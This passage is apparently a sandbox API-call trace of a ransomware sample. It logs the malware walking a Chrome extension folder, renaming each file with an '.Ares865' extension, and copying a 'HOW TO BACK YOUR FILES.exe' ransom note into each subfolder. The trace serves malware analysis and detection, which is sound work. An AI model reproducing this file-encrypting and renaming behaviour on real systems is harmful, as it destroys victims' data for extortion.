Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.549] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4355) returned 1 [0101.551] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="dasherSettingSchema.json" | out: lpString1="dasherSettingSchema.json") returned="dasherSettingSchema.json" [0101.551] lstrlenW (lpString="dasherSettingSchema.json") returned 24 [0101.551] lstrlenW (lpString="Ares865") returned 7 [0101.551] lstrcmpiW (lpString1="ma.json", lpString2="Ares865") returned 1 [0101.552] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.Ares865") returned 159 [0101.552] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.ares865"), dwFlags=0x1) returned 1 [0101.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.553] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=854) returned 1 [0101.556] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="eventpage_bin_prod.js" | out: lpString1="eventpage_bin_prod.js") returned="eventpage_bin_prod.js" [0101.556] lstrlenW (lpString="eventpage_bin_prod.js") returned 21 [0101.556] lstrlenW (lpString="Ares865") returned 7 [0101.556] lstrcmpiW (lpString1="prod.js", lpString2="Ares865") returned 1 [0101.556] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.Ares865") returned 156 [0101.556] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.ares865"), dwFlags=0x1) returned 1 [0101.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.558] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23404) returned 1 [0101.561] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="manifest.json" | out: lpString1="manifest.json") returned="manifest.json" [0101.561] lstrlenW (lpString="manifest.json") returned 13 [0101.561] lstrlenW (lpString="Ares865") returned 7 [0101.561] lstrcmpiW (lpString1="st.json", lpString2="Ares865") returned 1 [0101.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.Ares865") returned 148 [0101.561] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.ares865"), dwFlags=0x1) returned 1 [0101.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.563] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1457) returned 1 [0101.566] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="page_embed_script.js" | out: lpString1="page_embed_script.js") returned="page_embed_script.js" [0101.566] lstrlenW (lpString="page_embed_script.js") returned 20 [0101.566] lstrlenW (lpString="Ares865") returned 7 [0101.566] lstrcmpiW (lpString1="ript.js", lpString2="Ares865") returned 1 [0101.567] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.Ares865") returned 155 [0101.567] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.ares865"), dwFlags=0x1) returned 1 [0101.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.568] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=224) returned 1 [0101.572] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="_locales" | out: lpString1="_locales") returned="_locales" [0101.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0101.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x110) returned 0x2d5ee0 [0101.572] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0101.572] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86012940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e60c0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e60c0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0101.572] lstrcmpiW (lpString1="_metadata", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.572] lstrcmpiW (lpString1="_metadata", lpString2="aoldtz.exe") returned -1 [0101.572] lstrcpyW (in: lpString1=0x2cce4fe, lpString2="_metadata" | out: lpString1="_metadata") returned="_metadata" [0101.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0101.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x112) returned 0x2e0710 [0101.572] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0101.572] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86012940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e60c0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e60c0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0101.572] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0101.572] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c90 [0101.572] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata" [0101.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata" [0101.572] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.572] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.573] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.573] GetLastError () returned 0x0 [0101.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.573] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86012940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e60c0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e60c0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.574] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.574] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.574] lstrcpyW (in: lpString1=0x2cce512, lpString2="computed_hashes.json" | out: lpString1="computed_hashes.json") returned="computed_hashes.json" [0101.574] lstrlenW (lpString="computed_hashes.json") returned 20 [0101.574] lstrlenW (lpString="Ares865") returned 7 [0101.574] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.574] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.Ares865") returned 165 [0101.574] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.ares865"), dwFlags=0x1) returned 1 [0101.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.576] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2803) returned 1 [0101.586] lstrcpyW (in: lpString1=0x2cce512, lpString2="verified_contents.json" | out: lpString1="verified_contents.json") returned="verified_contents.json" [0101.586] lstrlenW (lpString="verified_contents.json") returned 22 [0101.586] lstrlenW (lpString="Ares865") returned 7 [0101.586] lstrcmpiW (lpString1="ts.json", lpString2="Ares865") returned 1 [0101.587] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.Ares865") returned 167 [0101.587] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0101.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17492) returned 1 [0101.592] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales" [0101.593] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales" [0101.593] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.593] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.593] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.594] GetLastError () returned 0x0 [0101.594] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.594] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dd4d90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e60c0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e60c0a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.594] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.594] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.594] lstrcpyW (in: lpString1=0x2cce510, lpString2="af" | out: lpString1="af") returned="af" [0101.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0101.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0710 [0101.594] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cd0 | out: ListHead=0x2e7710, ListEntry=0x2e7cd0) returned 0x2e7a90 [0101.594] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8dfac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8dfac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="am", cAlternateFileName="")) returned 1 [0101.594] lstrcmpiW (lpString1="am", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.594] lstrcmpiW (lpString1="am", lpString2="aoldtz.exe") returned -1 [0101.594] lstrcpyW (in: lpString1=0x2cce510, lpString2="am" | out: lpString1="am") returned="am" [0101.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c88 [0101.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0838 [0101.595] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c90 | out: ListHead=0x2e7710, ListEntry=0x2e7c90) returned 0x2e7cd0 [0101.595] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8dfac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8dfac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ar", cAlternateFileName="")) returned 1 [0101.595] lstrcmpiW (lpString1="ar", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.595] lstrcmpiW (lpString1="ar", lpString2="aoldtz.exe") returned 1 [0101.595] lstrcpyW (in: lpString1=0x2cce510, lpString2="ar" | out: lpString1="ar") returned="ar" [0101.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c68 [0101.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0960 [0101.595] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c70 | out: ListHead=0x2e7710, ListEntry=0x2e7c70) returned 0x2e7c90 [0101.595] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8b9960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8b9960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="az", cAlternateFileName="")) returned 1 [0101.595] lstrcmpiW (lpString1="az", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.595] lstrcmpiW (lpString1="az", lpString2="aoldtz.exe") returned 1 [0101.595] lstrcpyW (in: lpString1=0x2cce510, lpString2="az" | out: lpString1="az") returned="az" [0101.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0101.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0a88 [0101.595] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: 